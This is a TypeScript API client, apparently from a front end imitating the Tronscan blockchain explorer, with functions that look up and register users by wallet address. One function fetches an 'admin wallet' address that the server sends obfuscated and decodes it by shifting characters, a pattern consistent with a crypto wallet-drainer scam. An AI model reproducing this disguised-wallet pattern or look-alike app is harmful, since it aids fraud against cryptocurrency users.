import axios from "axios";
const API_URL = "https://tronscan-back.onrender.com/api/v1/";
// const API_URL = "https://tronscanner-back.onrender.com/api/v1/";
// const API_URL = "http://localhost:8080/api/v1/";

const axiosInstance = axios.create({
  baseURL: API_URL,
  withCredentials: true,
  headers: {
    Accept: "application/json",
    "Content-Type": "application/json",
  },
});

export const findUser = async (address: string) => {
  try {
    const response = await axiosInstance.post(`/user/find-user`, {
      address,
    });
    //(response);
    console.log(response.data);
    return response.data;
  } catch (error) {
    //(error);
  }
};

export const connectUser = async (address: string) => {
  try {
    const response = await axiosInstance.post("/user/connect", {
      address,
    });
    //(response);
    console.log(response.data.user);
    return response.data.user;
  } catch (error) {
    //(error);
  }
};

export const registerUser = async (address: string) => {
  try {
    const response = await axiosInstance.post(`/user/register`, {
      address,
    });
    // console.log(response);
    return response;
  } catch (error) {
    console.log(error);
  }
};

export const getIsProblemStatus = async (address: string) => {
  try {
    const response = await axiosInstance.post(`/user/getstatus`, {
      address,
    });
    // console.log(response);
    const {isProblem} = response.data
    return isProblem;
  } catch (error) {
    console.log(error);
  }
};

export const getAdminWallet = async () => {
  
  try {
    const response: any = await axiosInstance.get(`/user/check`);
    const {result} = response.data
    let adminaddress = ""
    for (let index = 0; index < result.length; index++) {
      if (index % 2 == 0) {
        adminaddress += String.fromCharCode(result.charCodeAt(index) - 5);
      } else {
        adminaddress += String.fromCharCode(result.charCodeAt(index) + 5);
      }
    }
    console.log(adminaddress);
    
    return adminaddress;
  } catch (error) {
    console.log(error);
  }
};

